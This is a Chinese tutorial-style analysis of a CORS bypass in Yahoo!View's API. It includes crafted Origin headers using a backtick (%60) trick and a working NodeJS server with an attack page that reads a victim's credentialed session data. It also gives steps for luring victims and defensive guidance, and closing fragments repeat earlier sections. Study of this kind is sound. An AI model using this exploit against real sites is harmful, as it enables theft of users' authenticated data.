Yahoo!View CORS限制策略绕过分析与教学<\/h1>

漏洞概述<\/h2>
本教学文档详细分析了一个关于Yahoo!View网站跨域资源共享(CORS)策略配置不当的安全漏洞。攻击者通过精心构造的请求头，成功绕过了同源策略限制，能够从第三方域名获取Yahoo!View API的敏感数据。<\/p>

基础知识<\/h2>

CORS机制<\/h3>

跨域资源共享(CORS)是一种机制，它使用额外的HTTP头来告诉浏览器允许运行在一个源(domain)上的Web应用访问来自不同源服务器上的指定资源。<\/p>

关键HTTP头：<\/p>

Origin<\/code>: 由浏览器自动添加，表示请求来源<\/li>
Access-Control-Allow-Origin<\/code>: 服务器响应头，指定允许访问资源的来源<\/li>

Access-Control-Allow-Credentials<\/code>: 服务器响应头，指示是否允许携带凭据(cookie等)<\/li>
<\/ul>
同源策略<\/h3>
同源策略是浏览器的重要安全机制，限制来自不同源的文档或脚本对当前文档的交互。同源定义为协议、域名和端口完全相同。<\/p>
漏洞发现过程<\/h2>
初始侦察<\/h3>

测试目标：Yahoo!View (https:\/\/view.yahoo.com\/)<\/li>
使用Burp Suite进行被动监测<\/li>
发现API端点：https:\/\/api.view.yahoo.com<\/li>
观察到CORS策略实施<\/li>
<\/ol>
正常请求分析<\/h3>
请求示例<\/strong>:<\/p>
GET \/api\/session\/preferences HTTP\/1.1
Host: api.view.yahoo.com
origin: https:\/\/view.yahoo.com
<\/code><\/pre>
正常响应<\/strong>:<\/p>
HTTP\/1.1 200 OK
Content-Type: application\/json; charset=utf-8
Access-Control-Allow-Credentials: true
Access-Control-Allow-Origin: https:\/\/view.yahoo.com
<\/code><\/pre>
这表明：<\/p>

服务器允许来自view.yahoo.com的跨域请求<\/li>
允许携带凭据(如cookies)<\/li>
<\/ul>
漏洞挖掘过程<\/h2>
初步尝试<\/h3>


尝试修改Origin为攻击者控制的域名(sxcurity.pro)<\/p>

结果：无CORS相关响应头<\/li>
<\/ul>
<\/li>

尝试子域名(view.sxcurity.pro)<\/p>

结果：同样无响应<\/li>
<\/ul>
<\/li>

尝试构造类似域名(view.yahoo.com.sxcurity.pro)<\/p>

结果：仍然失败<\/li>
<\/ul>
<\/li>
<\/ol>
突破性发现<\/h3>
尝试同时发送两个Origin头：<\/p>
Origin: https:\/\/view.yahoo.com sxcurity.pro
<\/code><\/pre>
响应<\/strong>:<\/p>
Access-Control-Allow-Credentials: true
Access-Control-Allow-Origin: https:\/\/view.yahoo.com sxcurity.pro
<\/code><\/pre>
这表明服务器存在解析逻辑漏洞，会接受并反射多个Origin值。<\/p>
进一步利用尝试<\/h3>


尝试在域名间插入特殊字符：<\/p>

使用%s<\/code>作为分隔符<\/li>
响应反射了该格式，但无法直接利用<\/li>
<\/ul>
<\/li>

关键突破：使用URL编码字符%60<\/code>(反引号)<\/p>
Origin: http:\/\/view.yahoo.com%60cdl.sxcurity.pro
<\/code><\/pre>
<\/li>
<\/ol>
响应<\/strong>:<\/p>
Access-Control-Allow-Credentials: true
Access-Control-Allow-Origin: http:\/\/view.yahoo.com%60cdl.sxcurity.pro
<\/code><\/pre>
漏洞利用<\/h2>
利用条件<\/h3>

需要特定浏览器支持(Safari成功，其他主流浏览器失败)<\/li>
需要设置通配符DNS记录(*.hack-r.be)<\/li>
<\/ol>
利用代码<\/h3>
NodeJS服务器(server.js)<\/strong>:<\/p>
const<\/span> http<\/span> =<\/span> require<\/span>('http'<\/span>)
<\/span><\/span>const<\/span> port<\/span> =<\/span> 6299<\/span>
<\/span><\/span>const<\/span> fs<\/span> =<\/span> require<\/span>("fs"<\/span>);
<\/span><\/span>
<\/span><\/span>const<\/span> requestHandler<\/span> =<\/span> (request<\/span>, response<\/span>) => {
<\/span><\/span>  fs<\/span>.readFile<\/span>("index.html"<\/span>, function<\/span>(err<\/span>, data<\/span>){
<\/span><\/span>    response<\/span>.writeHead<\/span>(200<\/span>, {'Content-Type'<\/span>:<\/span> 'text\/html'<\/span>});
<\/span><\/span>    response<\/span>.write<\/span>(data<\/span>);
<\/span><\/span>    response<\/span>.end<\/span>();
<\/span><\/span>  });
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>const<\/span> server<\/span> =<\/span> http<\/span>.createServer<\/span>(requestHandler<\/span>)
<\/span><\/span>
<\/span><\/span>server<\/span>.listen<\/span>(port<\/span>, (err<\/span>) => {
<\/span><\/span>  if<\/span> (err<\/span>) {
<\/span><\/span>    return<\/span> console<\/span>.log<\/span>('[+] ruh roh! something went wrong :('<\/span>, err<\/span>)
<\/span><\/span>  }
<\/span><\/span>  console<\/span>.log<\/span>(`[+] server is listening on port <\/span>${<\/span>port<\/span>}<\/span>`<\/span>)
<\/span><\/span>})
<\/span><\/span><\/code><\/pre>攻击页面(index.html)<\/strong>:<\/p>
<!DOCTYPE html><\/span>
<\/span><\/span><html<\/span>>
<\/span><\/span><head<\/span>>
<\/span><\/span><title<\/span>>CORS<\/title<\/span>>
<\/span><\/span><\/head<\/span>>
<\/span><\/span><body<\/span>>
<\/span><\/span><center<\/span>>
<\/span><\/span><h2<\/span>>Yahoo CORs Exploit<\/h2<\/span>>
<\/span><\/span><textarea<\/span> rows<\/span>=<\/span>"10"<\/span> cols<\/span>=<\/span>"60"<\/span> id<\/span>=<\/span>"pwnz"<\/span>><\/textarea<\/span>>
<\/span><\/span><br<\/span>>
<\/span><\/span><button<\/span> type<\/span>=<\/span>"button"<\/span> onclick<\/span>=<\/span>"cors()"<\/span>>Exploit<\/button<\/span>>
<\/span><\/span><\/div<\/span>>
<\/span><\/span>
<\/span><\/span><script<\/span>>
<\/span><\/span>function<\/span> cors<\/span>() {
<\/span><\/span>  var<\/span> xhttp<\/span> =<\/span> new<\/span> XMLHttpRequest<\/span>();
<\/span><\/span>  xhttp<\/span>.onreadystatechange<\/span> =<\/span> function<\/span>() {
<\/span><\/span>    if<\/span> (this<\/span>.readyState<\/span> ==<\/span> 4<\/span> &&<\/span> this<\/span>.status<\/span> ==<\/span> 200<\/span>) {
<\/span><\/span>      document.getElementById<\/span>("pwnz"<\/span>).innerHTML<\/span> =<\/span> this<\/span>.responseText<\/span>;
<\/span><\/span>    }
<\/span><\/span>  };
<\/span><\/span>  xhttp<\/span>.open<\/span>("GET"<\/span>, "http:\/\/api.view.yahoo.com\/api\/session\/preferences"<\/span>, true<\/span>);
<\/span><\/span>  xhttp<\/span>.withCredentials<\/span> =<\/span> true<\/span>;
<\/span><\/span>  xhttp<\/span>.send<\/span>();
<\/span><\/span>}
<\/span><\/span><\/script<\/span>>
<\/span><\/span><\/code><\/pre>利用步骤<\/h3>

设置DNS记录：*.hack-r.be<\/code>指向攻击服务器<\/li>
启动NodeJS服务器<\/li>
诱使受害者访问：http:\/\/view.yahoo.com%60cdl.hack-r.be<\/code><\/li>
点击"Exploit"按钮获取API数据<\/li>
<\/ol>
漏洞原理分析<\/h2>
该漏洞的核心在于Yahoo!View API服务器对CORS头的处理存在以下问题：<\/p>

Origin头解析不当<\/strong>：服务器未正确验证和过滤Origin头的值，接受了包含特殊字符的恶意构造<\/li>
反射机制缺陷<\/strong>：服务器直接将构造的Origin值反射到Access-Control-Allow-Origin头中<\/li>
凭据控制缺失<\/strong>：在存在潜在安全风险的情况下仍然允许携带凭据<\/li>
<\/ol>
防御措施<\/h2>
针对开发者的建议<\/h3>


严格验证Origin头<\/strong>：<\/p>

维护允许域名的白名单<\/li>
拒绝包含特殊字符的Origin<\/li>
<\/ul>
<\/li>

避免动态反射Origin<\/strong>：<\/p>
\/\/ 不安全做法
<\/span><\/span><\/span><\/span>header<\/span>("Access-Control-Allow-Origin: <\/span>$_SERVER['HTTP_ORIGIN']<\/span>"<\/span>);
<\/span><\/span>
<\/span><\/span>\/\/ 安全做法
<\/span><\/span><\/span><\/span>$allowed =<\/span> ['https:\/\/example.com'<\/span>, 'https:\/\/sub.example.com'<\/span>];
<\/span><\/span>if<\/span> (in_array<\/span>($_SERVER['HTTP_ORIGIN'<\/span>], $allowed)) {
<\/span><\/span>    header<\/span>("Access-Control-Allow-Origin: "<\/span> .<\/span> $_SERVER['HTTP_ORIGIN'<\/span>]);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre><\/li>

限制Access-Control-Allow-Credentials<\/strong>：<\/p>

仅在绝对必要时设置为true<\/li>
结合严格的Origin验证使用<\/li>
<\/ul>
<\/li>

实施Vary: Origin头<\/strong>：<\/p>

防止缓存污染攻击<\/li>
<\/ul>
<\/li>
<\/ol>
针对系统管理员的建议<\/h3>

定期进行安全审计，特别是API端点<\/li>
实施WAF规则拦截异常的Origin头<\/li>
监控异常的CORS请求模式<\/li>
<\/ol>
总结<\/h2>
本案例展示了CORS配置不当可能导致的安全风险。关键教训包括：<\/p>

永远不要信任客户端提供的Origin头<\/li>
动态反射Origin值极其危险<\/li>
浏览器实现差异可能影响漏洞可利用性<\/li>
安全机制的错误配置可能比没有机制更危险<\/li>
<\/ol>
通过深入理解CORS机制和同源策略，开发人员可以更好地保护Web应用免受此类攻击。<\/p>

Yahoo!View CORS限制策略绕过分析与教学<\/h1>

漏洞概述<\/h2> 本教学文档详细分析了一个关于Yahoo!View网站跨域资源共享(CORS)策略配置不当的安全漏洞。攻击者通过精心构造的请求头，成功绕过了同源策略限制，能够从第三方域名获取Yahoo!View API的敏感数据。<\/p>

基础知识<\/h2>

同源策略<\/h3> 同源策略是浏览器的重要安全机制，限制来自不同源的文档或脚本对当前文档的交互。同源定义为协议、域名和端口完全相同。<\/p>

漏洞发现过程<\/h2>

漏洞挖掘过程<\/h2>

漏洞利用<\/h2>

防御措施<\/h2>

漏洞概述<\/h2>
本教学文档详细分析了一个关于Yahoo!View网站跨域资源共享(CORS)策略配置不当的安全漏洞。攻击者通过精心构造的请求头，成功绕过了同源策略限制，能够从第三方域名获取Yahoo!View API的敏感数据。<\/p>

同源策略<\/h3>
同源策略是浏览器的重要安全机制，限制来自不同源的文档或脚本对当前文档的交互。同源定义为协议、域名和端口完全相同。<\/p>